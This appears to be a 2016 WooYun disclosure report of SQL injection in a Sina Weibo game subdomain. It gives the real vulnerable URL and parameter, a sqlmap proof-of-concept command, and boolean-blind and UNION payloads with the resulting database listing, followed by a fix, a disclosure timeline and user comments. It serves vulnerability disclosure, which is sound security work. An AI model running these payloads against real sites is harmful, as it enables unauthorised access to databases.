新浪微博某分站存在SQL注入(可UNION)

编号215648
Urlhttp://www.wooyun.org/bug.php?action=view&id=215648
漏洞状态厂商已经确认
漏洞标题新浪微博某分站存在SQL注入(可UNION)
漏洞类型SQL注射漏洞
厂商新浪微博
白帽子猪猪侠
提交日期2016-06-02 22:04:00
公开日期2016-07-18 16:20:00
修复时间(not set)
确认时间2016-06-03 00:00:00
Confirm Spend1
漏洞标签
关注数0
收藏数0
白帽评级
白帽自评rank10
厂商评级
厂商评rank8
漏洞简介
新浪微博某分站存在SQL注入(可UNION)
漏洞细节

# 网站
http://game.weibo.com
# 注入点,参数appid
http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888

POC

python sqlmap.py -u "http://game.weibo.com/webgame/ajax/pajaxGetServersList?callback=callback1&appid=3031123572&_=1464667300888" -p appid --dbs

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: appid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: callback=callback1&appid=3031123572' AND 5987=5987 AND 'EGPq'='EGPq&_=1464667300888
Type: UNION query
Title: MySQL UNION query (80) - 13 columns
Payload: callback=callback1&appid=3031123572' UNION ALL SELECT 80,80,80,80,80,80,CONCAT(0x71787a7171,0x4f6b476570785a737754,0x716b706a71),80,80,80,80,80,80#&_=1464667300888
---
[22:02:01] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
available databases [1]:
[*] app_vgwebgame

修复方案

强制类型转换

状态信息 2016-06-02: 细节已通知厂商并且等待厂商处理中
2016-06-03: 厂商已经确认,细节仅向厂商公开
2016-06-13: 细节向核心白帽子及相关领域专家公开
2016-06-23: 细节向普通白帽子公开
2016-07-03: 细节向实习白帽子公开
2016-07-18: 细节向公众公开
厂商回复感谢关注新浪安全,安全问题修复中。
回应信息危害等级:中漏洞Rank:8 确认时间:2016-06-03 16:17
Showing 1-3 of 3 items.
评论内容评论人点赞数评论时间

猪猪侠挖洞上瘾,谁帮他戒这个瘾

KeyMyran02016-06-03 16:49:00

那怎么打马赛克,感觉直播打三个白猫不错

Mark0smith02016-06-02 22:47:00

挖洞为啥不能直播呢,你直播一小时就是好几千,啧啧。-_-

B1gstar02016-06-02 22:28:00